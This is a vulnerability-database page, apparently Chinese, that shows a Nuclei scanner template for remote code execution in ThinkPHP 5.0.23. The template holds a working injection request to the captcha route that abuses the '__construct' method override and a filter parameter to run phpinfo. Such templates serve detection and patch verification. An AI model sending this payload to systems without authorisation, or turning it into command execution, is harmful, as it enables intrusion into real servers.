thinkphp-5023-rce: ThinkPHP 5.0.23 - Remote Code Execution

日期: 2025-08-01 | 影响软件: ThinkPHP | POC: 已公开

漏洞描述

ThinkPHP 5.0.23 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

PoC代码[已公开]

id: thinkphp-5023-rce

info:
  name: ThinkPHP 5.0.23 - Remote Code Execution
  author: dr_set
  severity: critical
  description: ThinkPHP 5.0.23 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
  metadata:
    max-request: 1
  tags: thinkphp,rce,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/index.php?s=captcha"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
          - "ThinkPHP"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206c7cc48cc2a6763a33791ad620a812a8b5110a8f2b73045e2e85c7bd3e191edd022100f270c3b19495361d6be02b80359f8b0d5fcef0bd80aa480e88b3b32904c5c1ad:922c64590222798bb761d5b6d8e72950

相关漏洞推荐